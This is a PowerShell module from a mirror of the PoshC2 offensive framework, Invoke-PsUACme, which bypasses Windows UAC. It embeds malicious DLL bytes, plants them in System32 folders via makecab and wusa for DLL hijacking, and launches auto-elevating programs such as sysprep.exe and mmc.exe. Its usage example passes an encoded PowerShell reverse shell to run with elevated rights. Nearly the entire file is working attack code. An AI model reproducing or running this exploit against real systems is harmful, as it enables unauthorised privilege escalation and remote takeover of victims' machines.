infosecn1nja
/
PoshC2_Python
mirror of https://github.com/infosecn1nja/PoshC2_Python.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
PoshC2_Python/Modules/Invoke-PsUACme.ps1

418 lines
50 KiB
PowerShell
Raw Normal View History

Initial Commit
2018-07-23 08:55:15 +00:00
function Invoke-PsUACme
{
<#
.SYNOPSIS
Nishang script which uses known methods to bypass UAC.
.DESCRIPTION
This script implements methods from UACME project (https://github.com/hfiref0x/UACME) to bypass UAC on Windows machines.
It drops DLLs in the known misconfigured/vulnerable locations of Windows machines using Wusa.exe and executes built-in executables
to bypass UAC. Following methods (named mostly on the basis of executables used) are implemented: "sysprep","oobe","ActionQueue",
"migwiz","cliconfg","winsat" and "mmc"
The DLLs dropped by the script is a modified version of Fubuki from the UACME project. It needs separate DLLs for 64 bit and 32 bit machines.
It is able to determine the bit-ness of the process from which it is called and uses the apt DLL.
The script drops cmd.bat in the C:\Windows\Temp directory and it is this batch file which is called from the DLL. Everything provided
to the Payload parameter ends up in this batch file.
Wusa.exe on Windows 10 has not "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently.
A clean up is done by the script after payload execution. But the DLLs dropped in secure locations must be removed manually.
The script must be run from a process running with medium integrity.
.PARAMETER Payload
Payload to be executed from the elevated process. Default one checks of the elevation was successful.
.PARAMETER method
The method to be used for elevation. Defaut one is sysprep.
.PARAMETER PayloadPath
The path to the payload. The default one is C:\Windows\temp\cmd.bat. To change this, change the path in DLL as well.
.PARAMETER CustomDLL64
Path to a custom 64 bit DLL.
.PARAMETER CustomDLL32
Path to a custom 32 bit DLL.
.PARAMETER $DllBytes64
Default 64 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.PARAMETER $DllBytesew
Default 32 bit DLL hard coded in the script. It is slightly modified Fubuki DLL from the UACME project.
.EXAMPLE
PS > Invoke-PsUACme -Verbose
Above command runs the sysprep method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Verbose
Above command runs the oobe method and the default payload.
.EXAMPLE
PS > Invoke-PsUACme -method oobe -Payload "powershell -windowstyle hidden -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAVABaAEYAZABhADgASQB3AEYASQBiAHYAQgAvAHMAUABoADkASwBOAGgATgBuAFEAMQBnADgAMgB5ADQAUwB0AGIAQwBJAE0AbABWAFgAWQBoAFgAZwBSADIANABQAHQAcgBGAFgAcwBFAFIAWAAxAHYAeQA5AHAAYgBlAGQAVgBEAHUASAA5AGUARQA1AGkAaABtAG0AQwBHAGMARQByAEQASABGAHYAagBlAGEALwBHAEIASQBFAHgANQB4AHcASgBZAFoASQBJAGwAaQBIAFMANgBSAGMAVABQAHkAeABYAHkAaQBaADQAYgB5ADQAdwB1AGsAOABDADcAZABwAEMAOABkAG8AdABGAHAATgA3AHAAawA1AGIAVgBHAHUAVgBJAHgAWgBCAG8AbwArAFUAbABEAGMATQBlADUATgA1ADAAZgBDADYAVwB4AG0ANgBqAE4AWABJAGwAdQBJAFQAcgB2AGQAYgBKADgAZgBUAHYAYgBGADIAOABkAEoAaQBvAHkAWgBpAGIAYQBYAFEAZQBJAGIAWgBjAFIASwBmAFEAUABzAEIAcABTAGoAKwBNAEoAcwBRAFQASABuAFkARwBVAEkATgBqADkANQBaAGkAUgBKAEsAaAArADcAdwBiAGMAbQB4AHcAMABPADUAUQBxAHIAUgBTAFoANABJAFAARQBXACsASQBQAEIAUgB4AGEAdQBvAHkAUgBiADgAQwB1AGYARwBxAHMAVwBYAFoATABvAFQAVABDAEwANQBqAEoAYwA2AHQAQQBFAEQAMQBBADIAdQBMADEASABCADgANAB3ADIAcABGAFYAMgB1AEIARwA2AGsASgBCAFgAaABtAGYAdwBCAGcASABZAEsAaQBUAGIAZgBZAFIARgAyAE4ASgBzAGIANwBzAGcAWABIADEAcQBFAEkAZABQAHkAVQBOAGgAbABlAG0AVwBiAGQAYgBNAEIAWgBzADcANQBxAEoALwBUAGYAVQBUAHkAeAArAHQAZwBrAGgAcQAzAE0AVQBkAHoAMQBYAHoAMQBOAHIAUAA5AE4AZABIAGoATgArADgAYQBwAGYAOABkAE4AMQBqAG8AegBmADMALwAwAEIAJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA=="
Above command runs the oobe method and the specified payload. The payload in this case is the one liner PowerShell reverse shell
(Shells directory of Nishang) which is base64 encoded using the Invoke-Encode (with the -OutCommand parameter) script from the
Utility directory of Nishang.
The reverse shell in above case runs with elevated privileges.
.LINK
http://www.labofapenetrationtester.com/2015/09/bypassing-uac-with-powershell.html
https://github.com/samratashok/nishang
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Payload = 'powershell.exe -noexit -c "if ([bool](([System.Security.Principal.WindowsIdentity]::GetCurrent()).groups -match ''S-1-5-32-544'')) {Write-Output ''You have elevated/Administrator rights!''}"',
[Parameter(Position = 1, Mandatory = $False)]
[ValidateSet("sysprep","oobe","ActionQueue","migwiz","cliconfg","winsat","mmc")]
[String]
$method = "sysprep",
[Parameter(Position = 2, Mandatory = $False)]
[String]
$PayloadPath = "C:\Windows\temp\cmd.bat",
[Parameter(Position = 3, Mandatory = $False)]
[String]
$CustomDll64,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$CustomDll32,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$DllBytes64 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 100 134 4 0 250 130 9 86 0 0 0 0 0 0 0 0 240 0 34 32 11 2 14 0 0 4 0 0 0 16 0 0 0 0 0 0 168 17 0 0 0 16 0 0 0 0 0 128 1 0 0 0 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 19 147 0 0 2 0 96 1 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 16 0 0 0 0 0 0 16 0 0 0 0 0 0 0 0 0 0 16 0 0 0 176 34 0 0 148 3 0 0 68 38 0 0 60 0 0 0 0 64 0 0 224 4 0 0 0 48 0 0 24 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 120 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 52 3 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 242 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 112 100 97 116 97 0 0 24 0 0 0 0 48 0 0 0 2 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 64 0 0 0 6 0 0 0 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 194 0 0 204 72 137 92 36 24 85 86 87 72 141 108 36 185 72 129 236 224 0 0 0 51 246 72 141 69 111 72 33 117 111 72 141 21 87 16 0 0 33 117 103 65 185 25 0 2 0 69 51 192 72 137 68 36 32 72 199 193 1 0 0 128 255 21 193 15 0 0 133 192 15 133 67 1 0 0 72 139 77 111 72 133 201 15 132 54 1 0 0 72 141 69 103 69 51 201 72 137 68 36 40 72 141 21 49 16 0 0 72 33 116 36 32 69 51 192 255 21 147 15 0 0 133 192 15 133 13 1 0 0 139 125 103 255 199 255 21 208 15 0 0 68 139 199 141 86 8 72 139 200 255 21 137 15 0 0 72 139 216 72 133 192 15 132 231 0 0 0 72 139 77 111 72 141 69 103 72 137 68 36 40 72 141 21 225 15 0 0 69 51 201 72 137 92 36 32 69 51 192 255 21 64 15 0 0 133 192 15 133 136 0 0 0 72 141 13 217 15 0 0 255 21 99 15 0 0 72 139 203 255 21 90 15 0 0 141 86 104 51 192 139 202 72 141 125 215 243 170 72 141 125 183 137 85 215 141 78 24 243 170 72 141 77 215 255 21 87 15 0 0 72 141 69 183 69 51 201 72 137 68 36 72 69 51 192 72 141 69 215 72 139 211 72 137 68 36 64 51 201 72 33 116 36 56 72 33 116 36 48 33 116 36 40 33 116 36 32 255 21 250 14 0 0 139 240 133 192 116 20 72 139 77 183 255 21 226 14 0 0 72 139 77 191 255 21 216 14 0 0 255 21 250 14 0 0 76 139 195 51 210 72 139 200 255 21 228 14 0 0 72 139 77 111 255 21 154 14 0 0 72 141 21 251 14 0 0 72 199 193 1 0 0 128 255 21 110 14 0 0 139 198 72 139 156 36 16 1 0 0 72 129 196 224 0 0 0 95 94 93 195 204 72 137 92 36 8 72 137 124 36 16 85 72 141 172 36 0 250 255 255 72 129 236 0 7 0 0 184 1 0 0 0 59 208 15 133 80 1 0 0 72 141 13 10 15 0 0 255 21 108 14 0 0 232 35 254 255 255 51 219 133 192 15 133 43 1 0 0 141 83 104 139 202 72 141 124 36 112 243 170 72 141 124 36 80 137 84 36 112 141 75 24 243 170 72 141 76 36 112 255 2
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DllBytes32 = "77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 232 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 53 114 7 185 113 19 105 234 113 19 105 234 113 19 105 234 172 236 162 234 116 19 105 234 113 19 104 234 124 19 105 234 131 74 97 235 123 19 105 234 131 74 105 235 112 19 105 234 131 74 150 234 112 19 105 234 113 19 254 234 112 19 105 234 131 74 107 235 112 19 105 234 82 105 99 104 113 19 105 234 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 80 69 0 0 76 1 4 0 4 49 10 86 0 0 0 0 0 0 0 0 224 0 2 33 11 1 14 0 0 4 0 0 0 16 0 0 0 0 0 0 46 17 0 0 0 16 0 0 0 32 0 0 0 0 0 16 0 16 0 0 0 2 0 0 6 0 0 0 6 0 0 0 6 0 0 0 0 0 0 0 0 80 0 0 0 4 0 0 162 232 0 0 2 0 64 5 0 0 16 0 0 16 0 0 0 0 16 0 0 16 0 0 0 0 0 0 16 0 0 0 80 33 0 0 148 3 0 0 192 37 0 0 60 0 0 0 0 48 0 0 224 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 60 0 0 0 16 33 0 0 56 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 60 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 46 116 101 120 116 0 0 0 137 2 0 0 0 16 0 0 0 4 0 0 0 4 0 0 0 0 0 0 0 0 0 0 0 0 0 0 32 0 0 96 46 114 100 97 116 97 0 0 50 7 0 0 0 32 0 0 0 8 0 0 0 8 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 115 114 99 0 0 0 224 4 0 0 0 48 0 0 0 6 0 0 0 16 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 64 46 114 101 108 111 99 0 0 60 0 0 0 0 64 0 0 0 2 0 0 0 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 66 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 195 85 139 236 131 236 92 83 87 141 69 252 51 219 80 104 25 0 2 0 83 104 64 32 0 16 104 1 0 0 128 139 251 137 93 252 137 93 248 255 21 4 32 0 16 133 192 15 133 241 0 0 0 57 93 252 15 132 232 0 0 0 86 139 53 8 32 0 16 141 69 248 80 83 83 83 104 96 32 0 16 255 117 252 255 214 133 192 15 133 199 0 0 0 139 69 248 64 80 106 8 255 21 48 32 0 16 80 255 21 20 32 0 16 139 216 133 219 15 132 169 0 0 0 141 69 248 80 83 87 87 104 96 32 0 16 255 117 252 255 214 133 192 117 107 139 53 36 32 0 16 104 120 32 0 16 255 214 83 255 214 106 68 90 139 202 141 69 164 198 0 0 64 131 233 1 117 247 106 16 89 141 69 232 198 0 0 64 131 233 1 117 247 141 69 164 137 85 164 80 255 21 52 32 0 16 141 69 232 80 141 69 164 80 51 192 80 80 80 80 80 80 83 80 255 21 32 32 0 16 139 248 133 255 116 16 255 117 232 139 53 28 32 0 16 255 214 255 117 236 255 214 83 106 0 255 21 48 32 0 16 80 255 21 44 32 0 16 255 117 252 255 21 12 32 0 16 104 64 32 0 16 104 1 0 0 128 255 21 0 32 0 16 94 139 199 95 91 139 229 93 195 85 139 236 129 236 112 6 0 0 51 192 64 83 86 57 69 12 15 133 60 1 0 0 104 160 32 0 16 255 21 36 32 0 16 232 172 254 255 255 51 219 133 192 15 133 27 1 0 0 106 68 90 139 202 141 69 172 136 24 64 131 233 1 117 248 106 16 89 141 69 240 136 24 64 131 233 1 117 248 141 69 172 137 85 172 80 255 21 52 32 0 16 185 10 2 0 0 141 133 160 253 255 255 136 24 64 131 233 1 117 248 190 4 1 0 0 141 133 160 253 255 255 86 80 104 212 32 0 16 255 21 40 32 0 16 133 192 15 132 189 0 0 0 59 198 15 131 181 0 0 0 185 16 4 0 0 141 133 144 249 255 255 136 24 64 131 233 1 117 248 102 139 133 160 253 255 255 141 141 144 249 255 255 102 133 192 116 30 15 183 240 141 149 160 253 255 255 139 193 43 208 102 137 49 131 193 2 1
)
if ($CustomDll64)
{
Write-Output "Reading 64 bit DLL."
[byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll64)
$DllBytes64 = $bytes -join ' '
}
elseif ($CustomDll32)
{
Write-Output "Reading 32 bit DLL."
[byte[]]$bytes = [System.IO.File]::ReadAllBytes($CustomDll32)
$DllBytes32 = $bytes -join ' '
}
if (([IntPtr]::Size) -eq 8)
{
Write-Output "64 bit process detected."
$DllBytes = $DllBytes64
}
elseif (([IntPtr]::Size) -eq 4)
{
Write-Output "32 bit process detected."
$DllBytes = $DllBytes32
}
Out-File -FilePath $PayloadPath -InputObject $Payload -Encoding ascii
$OSVersion = (Get-WmiObject -Class win32_OperatingSystem).BuildNumber
switch($method)
{
"Sysprep"
{
Write-Output "Using Sysprep method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "CRYPTBASE.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "shcore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\Sysprep\"
$execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"OOBE"
{
Write-Output "Using OOBE method"
Write-Output "Writing DLLs to Temp directory"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\oobe\"
$execpath = "C:\Windows\System32\oobe\setupsqm.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"ActionQueue"
{
Write-Output "Using Sysprep Actionqueue method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ActionQueue.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Warning "This method doesn't work Windows 8.1 onwards."
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\Sysprep\"
$execpath = "C:\Windows\System32\Sysprep\sysprep.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"migwiz"
{
Write-Output "Using migwiz method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "wdscore.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\migwiz\"
$execpath = "C:\Windows\System32\migwiz\migwiz.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"cliconfg"
{
Write-Output "Using cliconfg method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\"
$execpath = "C:\Windows\System32\cliconfg.exe"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"winsat"
{
Write-Output "Using winsat method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "devobj.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\sysprep\"
$execpath = "C:\Windows\System32\sysprep\winsat.exe"
$Targetwinsat = "$env:temp\uac_winsat.cab"
Write-Output "Copying C:\Windows\System32\winsat.exe to $env:temp"
Copy-Item "C:\Windows\System32\winsat.exe" "$env:temp\winsat.exe"
Write-Output "Creating cab $Targetwinsat"
$null = & makecab "$env:temp\winsat.exe" $Targetwinsat
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Targetwinsat /extract:$wusapath
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
"mmc"
{
Write-Output "Using mmc method"
if ($OSVersion -match "76")
{
Write-Output "Windows 7 found!"
$dllname = "ntwdblib.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "96")
{
Write-Output "Windows 8 found!"
$dllname = "elsext.dll"
$PathToDll = "$env:temp\$dllname"
Write-Output "Writing to $PathToDll"
[Byte[]] $temp = $DllBytes -split ' '
[System.IO.File]::WriteAllBytes($PathToDll, $temp)
}
if ($OSVersion -match "10")
{
Write-Warning "Windows 10 found. Wusa.exe on Windows 10 has no extract option. Not supported *yet*. "
}
$Target = "$env:temp\uac.cab"
$wusapath = "C:\Windows\System32\"
$execpath = "C:\Windows\System32\mmc.exe eventvwr.msc"
Write-Output "Creating cab $Target"
$null = & makecab $PathToDll $Target
Write-Output "Extracting cab to $wusapath "
$null = & wusa $Target /extract:$wusapath
Start-Sleep -Seconds 1
Write-Output "Executing $execpath "
& $execpath
}
}
#Clean up
Write-Output "Removing $Target."
Remove-Item -Path $Target
Write-Output "Removing $PathToDll."
Remove-Item -Path $PathToDll
Write-Output "$wusapath$dllname must be removed manually."
Write-Output "$PayloadPath must be removed manually."
}